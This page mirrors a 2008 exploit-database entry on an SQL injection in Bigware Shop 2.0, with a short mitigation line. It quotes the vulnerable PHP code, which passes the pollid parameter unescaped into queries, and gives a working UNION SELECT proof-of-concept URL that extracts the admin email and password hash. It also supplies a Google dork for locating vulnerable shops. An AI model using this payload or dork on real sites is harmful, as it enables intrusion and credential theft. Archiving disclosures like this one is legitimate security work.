header-logo
Suggest Exploit
vendor:
Bigware Shop
by:
D4m14n
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Bigware Shop
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: a:bigware:bigware_shop
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Bigware Shop 2.0

There is a SQL Injection vulnerability in the main_bigware_53.tpl.php file of Bigware Shop 2.0. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious pollid parameter. This will allow the attacker to view the admin's email address and salted password hash.

Mitigation:

Input validation should be used to prevent SQL Injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

###########################
###Bigware Shop 2.0########
#####################################################################
# Bug found by D4m14n  
# Vendor: http://www.bigware.de/
# Vuln. Version: 2.0 (prior versions also may be affected)
# Email: delta-1@secure-mail.net
#
# GoogleDork: "Diese Shopsoftware wurde entwickelt von Bigware"
#####################################################################

There's a SQL-Injection in "main_bigware_53.tpl.php"!
You can find more than this Injection in the Sourcecode (RFI,SQL-Injections).

#####################################################################
Sourcecode:
if (!isset($_GET['op'])) {
    $_GET['op']="list";
    }
switch ($_GET['op']) {
    case "results":
        if (isset($_GET['pollid'])) {
            $pollid=$_GET['pollid'];
        } else {
        $pollid=1;
        }
              $poll_query = go_db_query("SELECT pollid, timeStamp FROM phesis_poll_desc WHERE pollid='".$pollid."'");    
              $polls = go_db_fetch_array($poll_query);
                      $title_query = go_db_query("select optionText from phesis_poll_data where pollid=$pollid and voteid='0' and language_id = '" . $languages_id . "'");
                      $title = go_db_fetch_array($title_query);

#####################################################################
Proof-of-Concept:

main_bigware_53.php?op=results&pollid=-1/**/and/**/voteid=0/**/and/**/language_id=5/**/and/**/1=1/**/UnIOn/**/SeLeCt/**/ConCat(former_email_address,0x3a,former_password)/**/FrOM/**/former/**/WhEre/**/former_id=1/*

#####################################################################

You can see the Admins Email-Adress and his SALTED passwordhash (cracking this hash is very easy)

#####################################################################

If you are searching for a Coder, who searches Security-Holes in your Web-Applications,
feel free to contact me!
GreetZ 2 Shadowleet and some more ;)

PS: Immer wenn mir langweilig ist, dann veröffentliche ich Sicherheitslücken... 

# milw0rm.com [2008-01-29]

Navigation

Suggest Exploit

Services By CQR